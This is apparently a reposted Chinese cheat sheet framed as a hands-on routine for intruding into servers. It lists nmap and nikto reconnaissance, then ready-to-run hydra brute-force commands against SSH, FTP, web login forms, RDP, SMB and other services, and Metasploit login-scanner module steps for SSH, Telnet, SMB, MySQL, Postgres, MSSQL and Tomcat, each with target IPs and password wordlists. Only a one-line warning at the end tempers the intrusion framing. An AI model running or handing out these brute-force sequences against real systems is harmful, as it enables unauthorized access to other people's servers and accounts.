kali入侵服務器的那一套實戰


dnsenum  -enum       xxxxx.com    枚舉出網站的所有域名和服務器的ip地址

打開百度查詢ip地址的所在地

whatweb  xxxx.com  查看那些網站入口可以訪問   以狀態碼為准

whois  ip地址  查看ip所在地

nmap -sS     ip           匿名查看服務器開放的端口

nmap  -O或-A  查看服務器的什么系統

nmap -sV  查看服務器開放端口以及服務器版本

[nikto]

漏洞掃描
-T 選項包含了許多小選項,-T 9 表示掃描sql注入漏洞
0檢查文件上傳頁面
1檢查web日志
2檢查錯誤配置或默認文件
3檢查信息泄露問題
4檢查XSS/Script/Html問題
5從根目錄檢查是否存在可訪問的文件
6檢查拒絕服務器問題
7從任意文件檢索是否存在可訪問文件
8檢查是否存在系統命令執行漏洞
9檢查sql注入漏洞
b識別安裝的軟件版本
c檢查源代碼泄露問題
x反向鏈接選項

nikto  -h  ip    普通掃描全部漏洞

nikto -h  -h  ip  -p 端口號       掃描指定端口漏洞

nikto -h ip -C all  all表示CGI目錄猜解

nikto -h ip  -T 9  掃描sql注入漏洞

知道漏洞后開始爆破

[hydra(九頭蛇)]

-l 指定爆破帳號
-w 指定每個縣城的回應時間為10
-P 指定密碼字典
-t 指定爆破線程
-v 指定現實爆破過程
-f 查找到第一個可以使用的id和密碼的時候停止破解
hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 ssh
hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql
hydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22
暴力破解:
參數:
-R 繼續從上一次進度接着破解
-S 大寫,采用SSL鏈接
-s 小寫,可通過這個參數指定非默認端口
-l 指定破解的用戶,對特定用戶破解
-L 指定用戶名字典
-p 小寫,指定密碼破解,少用,一般是采用密碼字典
-P 大寫,指定密碼字典
-e 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探
-C 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P參數
-M 指定目標列表文件一行一條
-o 指定結果輸出文件
-f 在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解
-t 同時運行的線程數,默認為16
-w 設置最大超時的時間,單位秒,默認是30s
-v /-V顯示詳細過程

各協議的具體命令:
格式+示例:

1、破解ssh:
hydra -L 用戶名字典 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp:
hydra ip ftp -L 用戶名字典 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交,破解web登錄:
hydra -L 用戶名字典 -p 密碼字典 -t 線程 -vV -e ns ip http-get/admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get/admin/index.PHP

4、post方式提交,破解web登錄:
hydra --L 用戶名字典 -P 密碼字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
參數說明:
-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止,
10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示

5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -L 用戶名字典 -P 密碼字典 -s 端口號 -vV ip teamspeak

7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:
hydra -L 用戶名字典 -P pass.txt 10.36.16.18 smb

9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
-------------------------------------------------------------------
Kali Linux(Metasploit口令猜解模塊)

Metasploit口令猜解模塊——

SSH服務口令猜解:

msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模塊)

msf auxiliary(ssh_login) > show options (查看選項)

msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目標)

msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用戶名字典,或指定用戶)

msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(ssh_login) > set THREADS 50(線程)

msf auxiliary(ssh_login) > exploit (開始)

 

Telnet口令猜解:

msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模塊)

msf auxiliary(telnet_login) > show options (查看選項)

msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目標)

msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用戶名字典,或指定用戶)

msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(telnet_login) > exploit (開始)

 

Samba口令猜解:

msf > use auxiliary/scanner/smb/smb_login (使用smb_login模塊)

msf auxiliary(smb_login) > show options (查看選項)

msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目標)

msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用戶名字典,或指定用戶)

msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(ssmb_login) > exploit(開始)

 

Mysql口令猜解:

msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模塊)

msf auxiliary(mysql_login) > show options (查看選項)

msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目標)

msf auxiliary(mysql_login) > set USERNAME root(用戶名字典,或指定用戶)

msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(mysql_login) > exploit(開始)

 

Postgresq口令猜解:

msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模塊)

msf auxiliary(postgres_login) > show options (查看選項)

msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目標)

msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用戶名字典,或指定用戶)

msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(postgres_login) > exploit (開始)

 

Mssql口令猜解:

msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模塊)

msf auxiliary(mssql_login) > show options (查看選項)

msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目標)

msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用戶名字典,或指定用戶)

msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(mssql_login) > exploit(開始)

 

Tomcat口令猜解:

msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模塊)

msf auxiliary(tomcat_mgr_login) > show options(查看選項)

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目標)

msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用戶名字典,或指定用戶)

msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密碼字典文件)

msf auxiliary(tomcat_mgr_login) > exploit(開始)

hydra  -l   root   -P  /password.txt -vV  -t 10 -f  ip   ssh

也可以寫一個python腳本爆破

隆重聲明注意自己的行為,不要搞別人,人外有人,天外有天!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM